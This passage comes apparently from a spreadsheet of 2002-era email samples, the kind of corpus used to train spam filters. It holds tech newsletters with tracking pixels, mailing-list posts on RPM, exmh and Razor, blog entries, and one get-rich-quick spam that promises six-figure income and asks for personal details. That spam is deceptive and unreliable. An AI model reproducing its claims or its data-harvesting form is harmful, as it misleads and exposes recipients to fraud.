 4. &lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZkrxPi0hadaB0S22bbKAZR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePOUOKLGiFG9TmIKJ15BRdR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpw7Mx6ov_x31g9NPmdZPuR"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src="http://news.cnet.com/i/ne/bb/2002/07/0719_macworldroundup.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvnCmOTJIiSupcptbPMPR" &gt;Apple developers take center stage&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 At Macworld in New York, ZDNet Anchordesk Executive Editor David Coursey looks at the latest applications and hardware coming from Apple developers, including a new personal video recorder and back-up storage drive.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFzjFbpO9R0CGk_HtsonR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JHOq4o2Im0NpbnpTbdL3eR"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href="http://clickthru.online.com/Click?q=cc-h4fQQ0O796jcRIt7qeZDozn6f5yR" &gt;
 Gateway to unveil new Profile&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk1PzkDsAePhsYK3Awi9qlR" &gt;
 Groove tightens ties to Microsoft&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwQk7CcWA_YYRGOT9_Jmp4R" &gt;
 Check Point's revenue plummets&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQaMFc1y6CGftmZCtvxYhrR" &gt;
 Markets tumble on earnings outlooks&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzIPn95byotR-pp7us2QfiR" &gt;
 PayPal, Stamps.com seal deal&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIIbnEu2vvKNXLTSyPWc3PR" &gt;
 Big chill for federal IT spending&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpX0hKZNoysxoLkkTKhn-dR" &gt;
 Satellite phones getting taste of cellular&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hXMR0kILN8S_eSgFWVRR" &gt;
 WorldCom seeks OK to pay severance&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKU3zcASQEI_rjups7LLZ5ZR" &gt;
 BellSouth shares skid on earnings woes&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXnM4H3302OO3Nt-tKChBwnR" &gt;
 Real takes the open source route&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JMEBs9QaOYlcGhVIlcU_eR" &gt;
 Is Internet radio doomed?&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z2HbcgmpvqJzDxDXozLCyR" &gt;
 Ogg Vorbis official release is here&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgDZHzhGWvjg0SxiPZvH6lR" &gt;
 HP seeks Texas justice; Gateway gets dinged&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMW4gpfNvEXtTbDS-BJjho4R" &gt;
 Level 3 to help power Xbox Live&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOs8sNuzSmCs3CyJqsjeorR" &gt;
 Lexmark earnings surprise Wall Street&lt;/a&gt;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href="http://clickthru.online.com/Click?q=08-IFoQIRjTZeP4nmGg3F-erCpGY9iR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=1e-JQ9LzyjDxRIXqtPjLdqrE2qiC98rq9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjcJEkhwhkz6yClxb-7XsrR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVd_7yHUXl_kj2ZBSJuRR"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href="http://clickthru.online.com/Click?q=5d-JN-bIK0w8dxTgtEobvZm5yGKIaZR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUenE9qR7wrqMtNXjoCKqdR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8n4W81BNTFeplrQ8kasp4eR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanVDW4D_2AlXdIl9Oi-UiyR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0MIxriWJWr9i_f_B0NLnlR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLJOFc4h7gWdT_pfmeDx04R"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-22" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=dc-40Jz-aLcvqU5rUgzI0zPsXrZxdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Gearheads and bunnyhuggers in the OED
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85494694
 Date: Not supplied
 Some of the words in the new shorter Oxford English Dictionary: 
     Asylum seeker, economic migrant, bed-blocking, and stakeholder pension 
     reflect the serious side of life; bunny-hugger (a conservationist or animal 
     lover), chick flick (a film appealing to women), gearhead (a car 
     enthusiast), and Grinch (a spoilsport or killjoy) are entries in a more 
     light-hearted vein. Several entries are testaments to the popularity of 
     science fiction, among them Tardis from the TV series Doctor Who, Jedi from 
     Star Wars, and Klingon from Star Trek.  
 Link[1] Discuss[2] (_Thanks, Mark!_)
 [1] http://www.askoxford.com/worldofwords/wordfrom/shorter/
 [2] http://www.quicktopic.com/boing/H/2tC5tCQqCRD3b
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A biblical digression
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Adam
 &gt; L. Beberg
 &gt; 
 &gt; If the creator didnt say you could have it without paying, it's theft,
 so
 &gt; simple, hell that's even in all the major holy books.
 Ran across a site which claimed to explain the original meaning of the
 Ten Commandments.  It seems some of those meanings have evolved a bit,
 too.
 In particular, there was a claim that the commandment on stealing was
 actually specifically about 'man stealing -- selling a free man into
 slavery.  Certainly the US southerners were particularly sensitive to
 the term 'man stealer' in a way I didn't understand.
 Yep, I know he said all holy books.  No, I don't know if this site was
 blowing hot air.  It just read like someone had done their homework.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Harlan Feinstein wrote:
 &gt; Exmh keeps turning the folder indicator blue for one folder, and
 &gt; I've read all the messages in the folder.  Driving me nuts.  I've
 &gt; packed the folder, I've deleted the .mh_sequences file there,
 &gt; keeps doing it.  Help!  
 &gt; 
 I would rescan then do 'First Unseen', and see what happens ..
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sneak Peek: NEW HP Products
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Buyers Alert Announce&lt;/title&gt;
 &lt;/head&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt;
 &lt;div align="center"&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;table width="624" bgcolor="#232850" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr valign="bottom"&gt;&lt;td width="440"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/hd_buyers_alert.gif" width="440" height="60" alt="ZDNet Announce"&gt;&lt;/td&gt;
 &lt;td width="184"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/corner_anc.gif" width="184" height="8"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#232850" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr bgcolor="#ffffef"&gt;&lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" rowspan="2" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="600" height="32" align="center"&gt;&lt;font face="arial, helvetica" size="-1" color="#333333"&gt;&lt;b&gt;* * * * * * * * SPECIAL ADVERTISER ANNOUNCEMENT * * * * * * * *&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" rowspan="2" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#cccccc"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#ffffff"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width="600"&gt;&lt;font face="verdana, geneva" size="-2" color="#333333"&gt;&amp;nbsp;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;!-- date --&gt;
 July 18, 2002
 &lt;!-- /date --&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- ### promo content ### --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;HP Postcard&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;center&gt;
 &lt;table border="0" cellpadding="10" cellspacing="0"&gt;
     &lt;tr&gt;
         &lt;td&gt;
 &lt;table width="551" border="0" cellpadding="0" cellspacing="0"&gt;
     &lt;tr&gt;
         &lt;td rowspan="7"&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_01.gif" width="347" height="294"&gt;&lt;/td&gt;
         &lt;td&gt;
             &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXAWUZUs798BbBL7kOi_yR"&gt;
                 &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_02.gif" width="204" height="50" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_03.gif" width="204" height="67"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_04.gif" width="204" height="49"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXHbt-tY-Hd5q0_HZB17WnR"&gt;
                 &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_05.gif" width="204" height="17" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzFVqljWBP26D_8gaZjMeR"&gt;
                 &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_06.gif" width="204" height="17" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtiC3hhv-EMLKlXBDgnVsR"&gt;
                 &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_07.gif" width="204" height="20" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_08.gif" width="204" height="74"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td colspan="2"&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_09.gif" width="551" height="16"&gt;&lt;/td&gt;
     &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
     &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;!-- ### /promo content ### --&gt;
 &lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer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width="624"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href='http://clickthru.online.com/Click?q=59-y5OozjnNuCiDwN-4UQzUlGf6dM7xysRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://www.zdnet.com/filters/email/faq/"&gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://www.cnet.com/aboutcnet/0-13618.html?tag=ft"&gt;Advertise&lt;/a&gt;&lt;br&gt;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width=624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width=624 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr bgcolor="#1E5C99"&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=75&gt;&lt;a href="http://www.zdnet.com/"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://www.zdnet.com/techupdate/filters/main/" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020441,00.html" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020424,00.html" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020442,00.html" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020443,00.html" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020445,00.html" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020444,00.html" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020568,00.html" style="color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=624 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;tr:ad name="copyright" /&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=6e-2a7jniEv1DuKmbZi3ODXepsIWdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002 06:16:19 -0500, Brian Fahrlander &lt;kilroy@kamakiriad.com&gt; wrote:
 [yes, I know I'm replying to myself!]
 &gt;     Your page has a typo;
 &gt; 
 &gt; http://utelsystems.dyndns.org lists:
 &gt;     rpm http://utelsystems.dyndns.org/apt redhat testingrh73
 &gt;     rpm-src http://utelsystems.dyndns.org/apt redhat testing73  &lt;--
 &gt; 
 &gt;     This is why I'm so stubborn about using cut-and-paste; not only is it easy, it's typo-free.  :)
 &gt; 
 &gt; Wouldn't it be nice if there was a way to manage these automagically?  Some central site to make them available to the rest of the world, every time there's a "apt-get update"?  :)
     Also- I noticed this repo has about an 8K bandwidth.  Is there a way I can put this behind the others, so I don't hammer it for things that are at other repos?  I'm respectful about bandwidth, having lived on dialup for so long.  Now I'm on fiber optic and it's a whole other world...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</si>
  <si>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Subject: to the courthouse
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000637
 Date: 2002-10-05T21:15:55-06:00
 I guess it's time to reveal the incredibly kind invitation I received[1]. As 
 many of you may have found out or guessed, I will be attending oral argument 
 for the Eldred case[2] before the Supreme Court. 
 I'm incredibly excited, as you might imagine. Visiting the Supreme Court would 
 be quite enough, but seeing such an important case...Dayenu! When Lessig asked 
 me if I was free that day to come, I laughed because I couldn't (and still 
 can't) think of anything I'd rather do than attend. I am eternally grateful to 
 Lessig for the chance to attend. On the other hand, I'm sort of embarassed to 
 have the opportunity, when there are surely others who deserve it far more than 
 me. Luckily, it seems that such deserving others will be able to get seats by 
 camping in line with us. 
 So, I'll be arriving in D.C. on Tuesday, attending an 
 Eldred/Duke/EPIC/Bookmobile superparty, and then camping in line with Seth 
 Schoen[3], Lisa Rein, Jace Cooke but unfortunately not Cory Doctorow. If you'd 
 like to come with us, let me know. 
 I was hoping I'd be able to take notes and post them to my weblog for those who 
 couldn't make it, but as I read in today's Times, only lawyers and those with 
 official press credentials are allowed to take notes![4] I think this is 
 outrageous, but hopefully I will be able to remember enough to provide an 
 interesting account. 
 In a related irony, today was "Disney Day" at Borders[5], where they played 
 Disney rock songs with the volume turned up too loud, disturbing my usual habit 
 of reading a book there. However, I did manage to skim through _The Practice of 
 Programming_. 
 In an unrelated note, if you haven't been electrocuted by a Model T spark plug, 
 I highly recommend it.
 [1] http://www.aaronsw.com/weblog/000609
 [2] http://eldred.cc/
 [3] http://vitanuova.loyalty.org/2002-10-02.html
 [4] http://www.nytimes.com/2002/10/05/opinion/05AMAR.html
 [5] http://www.bordersstores.com/events/event_detail.jsp?SEID=15127444
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Want more money? [farea]
</t>
  </si>
  <si>
    <t xml:space="preserve">WEALTH IN THE NEW MILLENNIUM
 The New Millennium has arrived with more financial opportunities than ever
 before. Forget everything else that you have ever seen in the past because
 you are about to discover the Fastest way to earn Serious Money from home.
 You don't have to work 40 to 60 hours a week for 40 years all to make
 someone else wealthy. I have a better way!
 Are You Interested in creating immediate wealth?
 Our business develops 6 Figure Income Earners, quickly and easily.
 Have you considered improving the Quality of your Life? 
 Do you currently have the home, the car and the life style that you dream of?
 Then make the decision right now to Take Action and believe that all of your
 dreams are about to come true. 
 I will personally show you how I went from just getting by to earning over
 $100,000 in my very first year in this business.
 For More Information about this incredible life changing opportunity,
 please complete the form below. 
 The Information is FREE, confidential and you are under no risk or obligations.
 We are looking for those individuals who are serious about making a positive
 change in their life immediately.
 TAKE ACTION NOW!
 Please complete the form below.
 Name:
 Address:
 City:
 State:
 Zip:
 Country:
 Email:
 Home Phone:
 Other Phone:
 Best Time:
 Desired Monthly Income: Please choose one.
 $500
 $1000
 $2500
 $5000 or more
  The sooner you reply, the sooner you will start living the life
 you always dreamed of.
 To be Removed from this list Please reply
 with "Remove" in the subject line
 and you will be removed within 24 hours.
 mzsczzokjmosobfc
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Daniel wrote :
 &gt; &gt; Well, the 7.3 binary should work as long as you install the "rpm404"
 &gt; &gt; (IIRC) compatibility library. The only problem I have with some rpm 4.1
 &gt; &gt; versions is that it sometimes hangs at the and of operations (-e, -i,
 &gt; &gt; -F or -U) and the only workaround is to kill it, "rm -f
 &gt; &gt; /var/lib/rpm/__*" and try again.
 &gt; 
 &gt; Well, you're lucky if it sometimes works for you.  Mine hang all the 
 &gt; time, have to kill 'em with -9.  And after that, rpm doesn't work at all 
 &gt; (hangs right after i run the command, prints nothing).  Have to reboot 
 &gt; the machine to get anything rpm-related to work again.
 After that "kill -9", removing the "__*" files in /var/lib/rpm/ and trying
 again works 100% of the time for me. Did you try that?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</si>
  <si>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[SAdev] [Bug 960] COMMENT low-performing rule pruned
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=960
 spamassassin-contrib@msquadrat.de changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
              Status|NEW                         |RESOLVED
          Resolution|                            |WONTFIX
 ------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:16 -------
 I think it's ok to close this one? Comment is a valid, albeit seldom used RFC 
 2822 header...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</si>
  <si>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Re: [Razor-users] early experiences with Razor2 (and SA)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --huq684BweRXVnRxX
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Gary Funck &lt;gary@intrepid.com&gt; [2002-09-18 13:57:00 -0700]:
 &gt; In my experience, there are spam messages that sneak past Spam Assassin,
 &gt; that Razor will pick up. Those are the ones that I'm calling "marginal".
 &gt; Basically, I'm hoping that "the collective" of Razor users make a better
 &gt; judge of spam than any single program like SA can, and therefore I can
 &gt; benefit from their judgement and get more extensive spam filtering. I've
 &gt; seen examples of this already, where SA doesn't score the spam high enough
 &gt; to bounce it, but Razor does.
 I think perhaps you missed the fact that SA scores are adjustable.  If
 you want SA to tag all messages listed in Razor then you can put this
 in your ~/.spamassassin/user_prefs file.
   score RAZOR_CHECK 10
 The default score is 3 and the default threshold needed is 5.
 Therefore if you wish to have any razor listed messages tagged by SA
 then setting a score for any razor listed messages to anything above 5
 would be sufficient.
 If you are already using SA then the above would be more efficient.
 Otherwise you are running all of the mail through razor twice, once
 for SA and once again afterward.  If you really want to run Razor
 individually then you should set the 'score RAZOR_CHECK 0' so that SA
 won't do it and avoid the double network hit.
 However, one of the benefits of using SA in combination with Razor has
 been the history of false positive reports in the razor database.  The
 current score of 3 is hefty, but not enough by itself to tag as spam.
 But for any real spam is usually enough to push it over the threshold.
 Razor2 addresses the false positive problem but is not yet in as wide
 of use as Razor1.
 Bob
 --huq684BweRXVnRxX
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9iV7k0pRcO8E2ULYRAjoAAJ97CB6LpbhPHqa8IJx1l4g/LRiVdwCfUZIB
 kUAK30zsRWL8PTb1TrEQuy8=
 =XVm6
 -----END PGP SIGNATURE-----
 --huq684BweRXVnRxX--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: apt repository for irssi
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 24, 2002 at 12:18:27AM +0200, Roy-Magne Mo wrote:
 &gt; Seems like irssi.org also has an apt-rpm repository for snapshots of
 &gt; irssi:
 &gt; 
 &gt; rpm http://ninja.no/apt 7.3/i386 irssi
 &gt; rpm-src http://ninja.no/apt 7.3/i386 irssi
 Maybe sf.net should provide automated (how much more automated can it
 get? Well, maybe automatic one-click setup and instructions for those
 who can't read manuals and a place in which to drop gpg keys) apt-rpm
 (and maybe apt-deb though debian seems to package most stuff anyway)
 repositories. If it was one big repository for "stable" releases and
 each could have their own for "development" or "testing" releases. You
 handled your own repo and they did a nightly stable update for example.
 Also it should check that no-one can manage to put in a package with the
 same name as another one or otherwise sabotage the thing.
 (hmm, and I suppose the good sigmonster may deserve a cookie, too..)
 -- 
 Last time I was stoned, I tried to eat an airport.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
